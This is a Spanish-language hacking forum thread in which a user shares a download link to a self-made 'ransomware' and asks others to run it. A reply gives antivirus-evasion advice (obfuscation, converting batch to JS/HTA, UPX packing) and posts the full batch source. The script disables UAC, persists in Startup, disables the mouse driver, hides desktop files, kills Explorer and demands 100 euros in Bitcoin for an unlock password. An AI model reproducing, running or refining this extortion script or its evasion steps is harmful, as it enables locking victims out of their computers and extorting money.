He creado un Ransomware pero creo que me flata algo

Iniciado por Tirenex, 16 Octubre 2021, 18:08 PM

0 Miembros y 1 Visitante están viendo este tema.

Tirenex

Les dejo el link para que prueben qué le falta, ya que yo lo tengo probado y no sé al 100% si funcionará

http://www.mediafire.com/folder/hvhw,gq5xoa2e2jdctdo/shared

Xyzed

Hola.

Dale, ahí ejecuto el ransomware y te cuento que tal... 


:silbar:
...

Panic0

Cita de: Tirenex en 16 Octubre 2021, 18:08 PM
Les dejo el link para que prueben qué le falta, ya que yo lo tengo probado y no sé al 100% si funcionará

http://www.mediafire.com/folder/hvh44yd4u0uw8hw,gq5xoa2e2jdctdo/shared

Lo que le falta es que mediafire no lo detecté como virus... Ya hablando enserio, no esperes publicar un malware y que la gente lo vaya a abrir en un foro de hackers.
Los ataques de pánico suelen comenzar de forma súbita, sin advertencia.

**Aincrad**

Bueno primero que todo , Batch , enserio ?   :silbar:

Esto no cifra archivos, por lo tanto ni lo consideraría un ransomware.

Segundo, Al menos Ofúscalo, te recomiendo mi herramienta : https://toolslib.net/downloads/viewdownload/631-batch-ide/

Por ejemplo convierte el .bat a .js y después a .hta, luego lo empaquetas con upx y con eso seguro bajas el ratio de detecciones.

Ransomware.bat  :P

Código (bash) [Seleccionar]

o off
REG ADD HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
copy Ransomware.bat "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
@Echo off
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass" /f
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "LegalNoticeCaption" /t REG_SZ /d "TE DIJE QUE NO APAGARAS EL PC" /f
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "LegalNoticeText" /t REG_SZ /d "AHORA TE HE ROBADO EL MOUSE [PULSA BARRA ESPACIADORA O INTRO PARA CONTINUAR]" /f
@echo off
ATTRIB +H +S "C:\Users\%USERNAME%\Desktop\*" /S /D
echo on
color 0A
@echo off
title RANSOMWARE
taskkill /f /im explorer.exe
:bucle
cls   
echo =================================================================================       
echo          LEE CON ATENCION
echo         SI QUIERE RECUPERAR LA CUENTA!
echo =================================================================================
echo  - No reiniciar este PC!.
echo  - Al reiniciar se eliminara los datos del disco duro!.
echo  - Si usted cierra esta ventana no podra recuperar el PC!.
echo  - ENVIAR 100 Euros A esta direccion de BTC "35sP8MrpjWX7FHhy8wdv1hcSjMBokcQLRh"
echo    SI QUIERE OBTENER LA CLAVE!.
echo =================================================================================
echo  - Le daremos la clave al recibir el dinero
echo =================================================================================
set /p pass= Escriba aqui el password:
if %pass%==BvMIb2OBLM4l8RUFCpn0i3C (goto passcorrecto) ELSE (goto bucle)
:passcorrecto
ATTRIB -H -S "C:\Users\%USERNAME%\Desktop\*" /S /D
cls
@echo off
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\mouclass" /v "ImagePath" /t REG_EXPAND_SZ /d "\SystemRoot\System32\drivers\mouclass.sys" /f
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\mouclass" /v "Type" /t REG_DWORD /d "1" /f
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\mouclass" /v "Start" /t REG_DWORD /d "3" /f
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\mouclass" /v "ErrorControl" /t REG_DWORD /d "1" /f
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\mouclass" /v "DisplayName" /t REG_SZ /d "@msmouse.inf,%%mouclass.SvcDesc%%;Controlador de clase de mouse" /f
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\mouclass" /v "Owners" /t REG_MULTI_SZ /d "oem7.inf\0oem6.inf\0termmou.inf\0msmouse.inf" /f
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\mouclass" /v "Group" /t REG_SZ /d "" /f
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\mouclass\Enum" /v "0" /t REG_SZ /d "ACPI\VMW0003\4&1bd7f811&0" /f
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\mouclass\Enum" /v "Count" /t REG_DWORD /d "3" /f
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\mouclass\Enum" /v "NextInstance" /t REG_DWORD /d "3" /f
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\mouclass\Enum" /v "1" /t REG_SZ /d "HID\VID_0E0F&PID_0003&MI_00\8&367bfb7c&0&0000" /f
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\mouclass\Enum" /v "2" /t REG_SZ /d "HID\VID_0E0F&PID_0003&MI_01\8&12a4bdba&0&0000" /f
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "LegalNoticeCaption" /t REG_SZ /d "" /f
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "LegalNoticeText" /t REG_SZ /d "" /f
cd "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
del Ransomware.bat
cls
echo Felicidades! La clave es correcta.
echo     LEA ESTO!!!
echo ========================================================
echo Para volver a tener el mouse operativo, reinicie su pc
echo ========================================================
start explorer.exe
start explorer.exe
pause>nul
pause>nul
exit







Tirenex

Amigo, te recomiendo que elimines o modifiques el Ransomware para que otra persona no lo copie y haga el mal, por favor sé bueno

**Aincrad**

Nel, si querías sugerencias de que faltaba, debiste Poner el código fuente en la sección de scripts, No publicar un .exe y pretender que lo ejecutemos así nomas.

Por eso no quitare la source. además por que quitaría un simple batch que lo que hace es ocultar los archivos del escritorio y agregarse al inicio. quien querría usarlo ?

en pocas palabras tejo...





el-brujo